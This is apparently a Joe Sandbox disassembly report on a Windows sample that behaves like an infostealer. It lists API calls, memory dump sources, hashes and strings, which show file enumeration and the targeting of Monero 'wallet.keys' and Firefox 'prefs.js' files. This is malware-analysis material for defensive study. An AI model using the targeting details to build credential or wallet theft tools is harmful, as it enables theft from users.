                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009515B8,00950D96), ref: 0093F71E
                                • StrCmpCA.SHLWAPI(?,009515BC), ref: 0093F76F
                                • StrCmpCA.SHLWAPI(?,009515C0), ref: 0093F785
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0093FAB1
                                • FindClose.KERNEL32(000000FF), ref: 0093FAC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                 • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: prefs.js
                                • API String ID: 3334442632-3783873740
                                • Opcode ID: 6f1a3ec6a4a384a5c7e4a96146e287a3789cfc306f870819ba4339e4022723d2
                                • Instruction ID: 06262b907ada2e9d7e2a68509d8d0cc80a6ae24f786b7349520b994568c3e59f
                                • Opcode Fuzzy Hash: 6f1a3ec6a4a384a5c7e4a96146e287a3789cfc306f870819ba4339e4022723d2
                                • Instruction Fuzzy Hash: BDB1F0719502189BDB24EF64DC96FEE7379AFD4304F4085A8A40A97291EF306B49CF92
                                APIs
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0095510C,?,?,?,009551B4,?,?,00000000,?,00000000), ref: 00931923
                                • StrCmpCA.SHLWAPI(?,0095525C), ref: 00931973
                                • StrCmpCA.SHLWAPI(?,00955304), ref: 00931989
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00931D40
                                • DeleteFileA.KERNEL32(00000000), ref: 00931DCA
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00931E20
                                • FindClose.KERNEL32(000000FF), ref: 00931E32
                                  • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                  • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                 • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 1415058207-1173974218
                                • Opcode ID: 16a05224194079d20c8484bd30d03077433b46d115262a200d275c2904cdfa78
                                • Instruction ID: 8f49c196bfd66fb8b2588734b0d06a5cf148757edef77a5be472efd8fcea1087
                                • Opcode Fuzzy Hash: 16a05224194079d20c8484bd30d03077433b46d115262a200d275c2904cdfa78
                                • Instruction Fuzzy Hash: 61122071950118ABEB29FB60CC96FEE7378EF94304F414599B50A62191EF306F89CFA1
                                APIs
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00950C2E), ref: 0093DE5E
                                • StrCmpCA.SHLWAPI(?,009514C8), ref: 0093DEAE
                                • StrCmpCA.SHLWAPI(?,009514CC), ref: 0093DEC4
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0093E3E0
                                • FindClose.KERNEL32(000000FF), ref: 0093E3F2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                 • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                • String ID: \*.*
                                • API String ID: 2325840235-1173974218
                                • Opcode ID: 6a2c5d8af793bf5bda2ce18cf50638519f55a06908f9d87b57350c2ee6299864
                                • Instruction ID: 9575d49eea3461f11a1de5316233e31917534f3dea1efdad2fedb669aef7fb54
                                • Opcode Fuzzy Hash: 6a2c5d8af793bf5bda2ce18cf50638519f55a06908f9d87b57350c2ee6299864
                                • Instruction Fuzzy Hash: B6F19D719541189AEB29EB60DC95FEE7338FF94304F8141D9B40A62191EF306F8ACF66
                                APIs
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                  • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009514B0,00950C2A), ref: 0093DAEB
                                • StrCmpCA.SHLWAPI(?,009514B4), ref: 0093DB33
                                • StrCmpCA.SHLWAPI(?,009514B8), ref: 0093DB49
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0093DDCC
                                • FindClose.KERNEL32(000000FF), ref: 0093DDDE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                 • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID:
                                • API String ID: 3334442632-0
                                • Opcode ID: 2ba05d426389289720a977b181fadf476821f966282bb70babdefdbe6fbbd6bc
                                • Instruction ID: c010cc819bab9768bb3179c51ec93cdcb64036219b001587016220d244e3409d
                                • Opcode Fuzzy Hash: 2ba05d426389289720a977b181fadf476821f966282bb70babdefdbe6fbbd6bc
                                • Instruction Fuzzy Hash: 23912072900104ABDB14FBB0EC96EED737DABC4304F408668F91A96191EE349B59CF92
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                 • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ,Jv?$;@e}$>Q,]$gNi$zL/$l?$"{$mN~$o
                                • API String ID: 0-419573658
                                • Opcode ID: 0f4e1fd0eeeba449375f9e2be009b8c304aee6eae3e8f386791429748dd375ec
                                • Instruction ID: 46515f39747c500d201bcbbb0dad1e394f4d8933bf78ab56f847794eb2478a7d
                                • Opcode Fuzzy Hash: 0f4e1fd0eeeba449375f9e2be009b8c304aee6eae3e8f386791429748dd375ec
                                • Instruction Fuzzy Hash: 71B23AF3A086049FE304AE2DEC8567ABBE5EF94320F16463DEAC4C7744E93598058797
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                 • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: "]?$,{}$D*}?$E>~$`Os$gB~|$p{/_$q2]k
                                • API String ID: 0-411262055
                                • Opcode ID: c38fa224c1302b24ca130e0d1a27b8b47960a1510880ac5d0f469cf3b3cf1e99
                                • Instruction ID: e091fdc603d7084d14614bd5e8b4eb8f4e2d6be5e99908f8dc3345466fc033e3
                                • Opcode Fuzzy Hash: c38fa224c1302b24ca130e0d1a27b8b47960a1510880ac5d0f469cf3b3cf1e99
                                • Instruction Fuzzy Hash: 3EB2F7F3A0C2009FE704AE29EC8567AB7E5EF94720F16893DEAC4C7744E63598418797
                                APIs
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • GetKeyboardLayoutList.USER32(00000000,00000000,009505AF), ref: 00947BE1
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00947BF9
                                • GetKeyboardLayoutList.USER32(?,00000000), ref: 00947C0D
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00947C62
                                • LocalFree.KERNEL32(00000000), ref: 00947D22
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                 • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                • Opcode ID: 8be94cc05d86d1489b8844bfdbd07df7a9c42b7ef37910303d1a56e07abee4ce
                                • Instruction ID: 46afba87aae3706da6a523100a0507fbf639b7dd654981416b19dd0dad0f1259
                                • Opcode Fuzzy Hash: 8be94cc05d86d1489b8844bfdbd07df7a9c42b7ef37910303d1a56e07abee4ce
                                • Instruction Fuzzy Hash: F041397194021CABDB24DB94DC99FEEB3B8FF84705F204199E50A62291DB342F85CFA1
                                APIs
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                  • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00950D73), ref: 0093E4A2
                                • StrCmpCA.SHLWAPI(?,009514F8), ref: 0093E4F2
                                • StrCmpCA.SHLWAPI(?,009514FC), ref: 0093E508
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0093EBDF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 433455689-1173974218
                                • Opcode ID: c351e0ab33e69bd2e1741680c34592232747621a59accc69d4d7b4591a3cace2
                                • Instruction ID: c9dfda24b818054dd9d34a4e867cba153c74cb6da39ee6a1190b7db1bc026e3c
                                • Opcode Fuzzy Hash: c351e0ab33e69bd2e1741680c34592232747621a59accc69d4d7b4591a3cace2
                                • Instruction Fuzzy Hash: 21124172950118AAEB28FB60DC96FED7338AFD4304F4045A8B50A96191EF306F49CF92
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: $03$.p{$6my$B5$!L"$!L"
                                • API String ID: 0-3844536532
                                • Opcode ID: a22c92d3112574be6d86b271ebc94996e5190923a6721ebf48284172eeeb12b5
                                • Instruction ID: 823f703246e452c933e60f117cc9605b4e7c106f05ebc69dac8e07c509cc9c57
                                • Opcode Fuzzy Hash: a22c92d3112574be6d86b271ebc94996e5190923a6721ebf48284172eeeb12b5
                                • Instruction Fuzzy Hash: 6CB209F390C2049FE304AE2DEC8567ABBE5EF94720F1A493DEAC4C3744EA7558058697
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !k}$:L[w$JwJ$a^}o$l=h<
                                • API String ID: 0-3146314459
                                • Opcode ID: 913b7a8b5e80b9948bf26fc1d987fba2ca176051bf3e13730bcd6c90b1031172
                                • Instruction ID: 09f389aab57dfd6d37d51c833547cb9337a5da9930a48b36de96b2f0f68c7da8
                                • Opcode Fuzzy Hash: 913b7a8b5e80b9948bf26fc1d987fba2ca176051bf3e13730bcd6c90b1031172
                                • Instruction Fuzzy Hash: A3A2D4F350C200AFE704AE2DEC8167ABBE9EF94720F16493DEAC5C7744E63598148697
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0093C871
                                • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0093C87C
                                • lstrcat.KERNEL32(?,00950B46), ref: 0093C943
                                • lstrcat.KERNEL32(?,00950B47), ref: 0093C957
                                • lstrcat.KERNEL32(?,00950B4E), ref: 0093C978
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
